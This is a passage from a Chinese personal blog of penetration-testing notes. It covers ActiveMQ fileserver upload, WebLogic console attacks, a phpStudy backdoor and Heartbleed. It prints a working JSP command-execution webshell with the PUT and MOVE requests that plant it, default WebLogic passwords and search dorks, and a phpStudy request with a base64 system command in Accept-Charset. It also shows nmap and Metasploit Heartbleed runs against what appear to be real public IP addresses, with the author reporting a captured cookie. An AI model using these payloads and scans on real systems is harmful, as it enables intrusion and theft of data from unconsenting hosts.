<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZy4E"><img src="https://s3.jpg.cm/2021/10/02/ImZy4E.png" alt="ImZy4E.png"></a></p>
<p>2、PUT 一个 Jsp 的 Webshell 到 fileserver 目录<br><hanla></hanla>PUT /fileserver/1.jsp HTTP/1.1 </p>
<pre><code>
&lt;%@ page import="java.io.*"%&gt;
&lt;%
    out.print("Hello&lt;/br&gt;");
    String strcmd = request.getParameter("cmd");
    String line =null;
    
     Process p=Runtime.getRuntime().exec(strcmd);
 
    InputStream is = p.getInputStream();
     
 BufferedReader br = new BufferedReader(new InputStreamReader(is));
   
 while((line =br.readLine())!=null){
        
out.print(line+"&lt;br&gt;");
   
 }
%&gt;
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZZ3L"><img src="https://s3.jpg.cm/2021/10/02/ImZZ3L.png" alt="ImZZ3L.png"></a></p>
<p>3、利用 MOVE 方法将 Webshell 移入 admin/ 目录<br><hanla></hanla>MOVE /fileserver/1.jsp  HTTP/1.1<br>Destination:file://C:\activemq\webapps\admin\11.jsp  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGLuU"><img src="https://s3.jpg.cm/2021/10/02/IpGLuU.png" alt="IpGLuU.png"></a></p>
<p><hanla></hanla>成功执行<hanla></hanla>webshell<hanla></hanla>权限</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZOSH"><img src="https://s3.jpg.cm/2021/10/02/ImZOSH.png" alt="ImZOSH.png"></a></p>
<h2 id="weblogic攻击"><a href="#weblogic攻击" class="headerlink" title="weblogic攻击"></a><hanla></hanla>weblogic<hanla></hanla>攻击</h2><p><hanla></hanla>批量扫描<hanla></hanla>WebLogic<hanla></hanla>缺省的<hanla></hanla>WEB<hanla></hanla>管理端口（http<hanla></hanla>为<hanla></hanla>7001，https<hanla></hanla>为<hanla></hanla>7002），<br><hanla></hanla>开放这两个端口的一般都是安装有<hanla></hanla>WebLogic<hanla></hanla>的主机。<br><hanla></hanla>2、Google<hanla></hanla>搜索关键字<hanla></hanla>“WebLogic Server Administration Console   inurl:console”，<br><hanla></hanla>URL<hanla></hanla>后面是<hanla></hanla>console<hanla></hanla>结尾的，一般为目标。   </p>
<p><hanla></hanla>在找到的目标<hanla></hanla>URL<hanla></hanla>后面加上<hanla></hanla>console，回车就会自动跳转到管理登录页面<br>尝试弱口令登录<br><hanla></hanla>1、用户名密码均为：weblogic  </p>
<p>2、用户名密码均为：system<br>3、用户名密码均为：portaladmin<br>4、用户名密码均为：guest   </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGIPf"><img src="https://s3.jpg.cm/2021/10/02/IpGIPf.png" alt="IpGIPf.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGP4O"><img src="https://s3.jpg.cm/2021/10/02/IpGP4O.png" alt="IpGP4O.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGRMw"><img src="https://s3.jpg.cm/2021/10/02/IpGRMw.png" alt="IpGRMw.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGW88"><img src="https://s3.jpg.cm/2021/10/02/IpGW88.png" alt="IpGW88.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGnki"><img src="https://s3.jpg.cm/2021/10/02/IpGnki.png" alt="IpGnki.png"></a></p>
<p>一直点下一步，然后点完成</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpG59k"><img src="https://s3.jpg.cm/2021/10/02/IpG59k.png" alt="IpG59k.png"></a></p>
<h2 id="phpstudy-rce-漏洞复现"><a href="#phpstudy-rce-漏洞复现" class="headerlink" title="phpstudy rce 漏洞复现"></a>phpstudy rce 漏洞复现</h2><pre><code><hanla></hanla>宝塔  
ip:888  
ip:8888/admin/
存储<hanla></hanla>xss
phpstudy
upupw
wamp

管理员配置不当
phpmyadmin
root  如果弱口令 很容易爆破

https://www.freebuf.com/articles/web/215823.html

GET / HTTP/1.1
Host: 192.168.1.91
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64;rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Acept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

这个位置就是你要执行的命令<hanla></hanla>Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
base64<hanla></hanla>编码
</code></pre>
<h2 id="心脏滴血漏洞"><a href="#心脏滴血漏洞" class="headerlink" title="心脏滴血漏洞"></a>心脏滴血漏洞</h2><p><hanla></hanla>shadon.io<hanla></hanla>上面搜索<br><hanla></hanla>OpenssL/1.0.1a</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGQQe"><img src="https://s3.jpg.cm/2021/10/02/IpGQQe.png" alt="IpGQQe.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43886632/article/details/88050773">https://blog.csdn.net/weixin_43886632/article/details/88050773</a><br><hanla></hanla>这里我<hanla></hanla>ngrok.<hanla></hanla>冲钱了也不知道啥问题连不上了，emmm<br><hanla></hanla>经过了一天时间终于找到了错误所在<br><hanla></hanla>在隧道管理那里一定要填自己的真实<hanla></hanla>ip<br><hanla></hanla>然后我又把自己的虚拟机改成了桥接模式具体文章看这篇<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/A807296772/article/details/77616130"><hanla></hanla>https://blog.csdn.net/A807296772/article/details/77616130</a>  </p>
<p>nmap -sV -p 443,8443 –script=ssl-heartbleed [you ip]<br>190.107.28.130<br>nmap -sV -p 443,8443 –script=ssl-heartbleed 109.126.11.26  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpG8Bt"><img src="https://s3.jpg.cm/2021/10/02/IpG8Bt.png" alt="IpG8Bt.png"></a></p>
<p>这里扫出来是存在这样一个漏洞的  </p>
<pre><code><hanla></hanla>打开<hanla></hanla>Metasploit，启动<hanla></hanla>msf。然后使用 auxiliary/scanner/ssl/openssl_heart_bleed<hanla></hanla>功能。
a) 打开<hanla></hanla>msfconsole<hanla></hanla>后，
查找<hanla></hanla>heartbleed<hanla></hanla>模块：
#msf&gt;search heartbleed
#msf &gt; use auxiliary/scanner/ssl/openssl_heartbleed

设置<hanla></hanla>verbose，
这个设置要设置成<hanla></hanla>true<hanla></hanla>才能看到泄露的信息

#msf auxiliary(openssl_heartbleed) &gt; set  verbose true
(此设置主要是为了显示整个过程以及<hanla></hanla>leak<hanla></hanla>出来的数据，如果没有的话只显示如下图结果)
f)
 exploit
#msf auxiliary(openssl_heartbleed) &gt; exploit
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGAOR"><img src="https://s3.jpg.cm/2021/10/02/IpGAOR.png" alt="IpGAOR.png"></a></p>
<p><hanla></hanla>执行<hanla></hanla>run<hanla></hanla>命令，运行扫描器，查看结果，可以看到有<hanla></hanla>Heartbeat response with   leak<hanla></hanla>的字样，证明该站存在<hanla></hanla>HeartBleed<hanla></hanla>漏洞</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpGc8z"><img src="https://s3.jpg.cm/2021/10/02/IpGc8z.png" alt="IpGc8z.png"></a></p>
<p><hanla></hanla>我这里好像得到了<hanla></hanla>cookie</p>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2018 - 2021 Hongxiaodou
            <span class="footer-icon">
                <a-icon type="flag" theme="filled"></a-icon></span>
            @hongxiaodou
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> &amp; <a target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'zh-CN',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>



</body></html>